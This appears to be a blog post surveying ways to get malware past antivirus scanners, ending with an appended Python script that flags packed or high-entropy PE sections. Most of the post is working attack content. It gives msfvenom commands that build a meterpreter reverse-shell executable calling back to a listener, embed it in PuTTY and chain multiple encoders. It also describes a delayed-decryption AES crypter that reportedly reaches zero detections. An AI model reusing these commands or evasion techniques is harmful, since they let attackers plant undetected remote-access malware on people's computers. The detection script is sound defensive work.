A Quick Survey on Anti-Anti-Viruses

c++ malware

tl;dr

AVs can easily be bypassed using AES-based malware crypters like Crypt0r:

AES Parameters

Open Source Evasion Techniques

All of the following results are based on a meterpreter file which was generated like this:

msfvenom \
  -p windows/meterpreter/reverse_tcp \
  --platform windows \
  -f exe \
  LHOST=192.168.1.1 \
  LPORT=1337 \
  -o meter.exe

All scans were performed on VirusTotal. Please note that this covers static analysis only. However, it will become clear later on that dynamic analysis of the techniques used is not required at all.

Packers

Packers compress an executable and decompress it at runtime using an embedded decompression stub. Packing with UPX actually looks suspicious to AV engines: the detection rate goes up rather than down:

Without Packer 39/56
With Packer 41/56

Binder

This technique combines two executables, a malicious one and a benign one, into a single file. The malicious code is executed in a separate thread on startup. This command was used to embed a meterpreter shell into the SSH client PuTTY:

msfvenom \
  -p windows/meterpreter/reverse_tcp \
  --platform windows \
  -x putty.exe \
  -k \
  -f exe \
  LHOST=192.168.1.1 \
  LPORT=1337 \
  -o meter.exe

A slight decrease in detections can be seen:

Without Binder 39/56
With Binder 33/56

Encoders

Encoders obscure the malicious payload. There are many different approaches to this, but the polymorphic encoder shikata_ga_nai is one of the most widely used. When an encoded malware file is executed, the entry point of the decoding routine is called first; the payload is then decoded and executed.

The results are the following:

No Encoder 39/56
XOR 33/56
powershell_x86 33/56
shikata_ga_nai 33/56

The choice of encoder makes no difference to the detection rate - let's combine multiple encoders with the binding technique:

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.1.1 \
  LPORT=1337 \
  -f raw \
  -e x86/context_time \
  -i 1 \
  --platform windows |
msfvenom -a x86 \
  --platform windows \
  -e x86/countdown \
  -i 7 \
  -f raw |
msfvenom -a x86 \
  --platform windows \
  -e x86/context_cpuid \
  -i 1 \
  -f raw |
msfvenom -a x86 \
  --platform windows \
  -e x86/shikata_ga_nai \
  -i 2 \
  -x putty.exe \
  -k \
  -f exe \
  -o meter.exe

This yields 30/56 - better but still not zero.

Using Veil

Veil makes hiding payloads quite easy thanks to its built-in assistant. Using the payload

python/shellcode_inject/aes_encrypt

in combination with Pyherion and shellcode for

windows/meterpreter/reverse_tcp

reduces the detection rate to 19/56.

Crypters

Crypters encrypt the malicious shellcode with a strong encryption algorithm. To execute the payload at runtime, the so-called stub brute-forces the embedded encrypted shellcode in order to invoke it. Using AES-128 and a delayed decryption, it was possible to reduce the detection rate to zero for both scan-time and runtime. The runtime detection bypass simply delays the start of the decryption routine by performing unnecessary actions like:

In my tests, wasting about 30 seconds was enough to “shake off” the AV runtime check.

You can check out the source code here.
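From the defender's side, the Packers and Crypters sections above both leave a static fingerprint: UPX names its sections UPX0/UPX1, and compressed or AES-encrypted shellcode is close to 8 bits of entropy per byte. The following Python script is an added example, not code from the original post or from Crypt0r; it walks the PE section table with a minimal hand-written parser and flags both signals. The sample PE is constructed inline (header-only, parseable but not loadable) and the 7.2 entropy threshold is an assumption.

```python
import math
import struct
from collections import Counter
# Section names left behind by the UPX packer.
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2"}

def shannon_entropy(data: bytes) -> float:
    """Bits per byte (0..8); compressed or encrypted data sits close to 8."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def pe_sections(pe: bytes):
    """Minimal PE section-table walk: yields (name, raw_section_bytes)."""
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    # COFF header follows the 4-byte signature: Machine, NumberOfSections, ..., SizeOfOptionalHeader
    _, num_sections, _, _, _, opt_header_size, _ = struct.unpack_from("<HHIIIHH", pe, e_lfanew + 4)
    table = e_lfanew + 24 + opt_header_size  # section headers follow the optional header
    for i in range(num_sections):
        hdr = table + 40 * i
        name = pe[hdr:hdr + 8].rstrip(b"\0")
        raw_size, raw_ptr = struct.unpack_from("<II", pe, hdr + 16)  # SizeOfRawData, PointerToRawData
        yield name, pe[raw_ptr:raw_ptr + raw_size]

def triage(pe: bytes, entropy_threshold: float = 7.2) -> list:
    """Flag UPX section names and high-entropy sections, i.e. packed or crypted payloads."""
    findings = []
    for name, data in pe_sections(pe):
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{name.decode()}: UPX section name")
        ent = shannon_entropy(data)
        if ent >= entropy_threshold:
            findings.append(f"{name.decode()}: high entropy {ent:.2f}")
    return findings

def build_sample_pe(sections) -> bytes:
    """Constructed test input: header-only PE with no optional header (parseable, not loadable)."""
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0)
    offset = 0x40 + 4 + 20 + 40 * len(sections)  # raw data starts right after the headers
    table, blobs = b"", b""
    for name, data in sections:
        table += name.ljust(8, b"\0") + struct.pack("<IIII", len(data), 0x1000, len(data), offset)
        table += b"\0" * 16  # relocation and line-number fields, unused here
        blobs += data
        offset += len(data)
    dos_header = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)  # e_lfanew = 0x40
    return dos_header + b"PE\0\0" + coff + table + blobs

# Constructed sample: a plain code section plus a UPX-named section of 8-bit-entropy data.
SAMPLE_PE = build_sample_pe([(b".text", b"\x90" * 512), (b"UPX1", bytes(range(256)) * 4)])
```

Run `triage(SAMPLE_PE)` to see the two findings; on a real file, pass `open(path, "rb").read()`.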
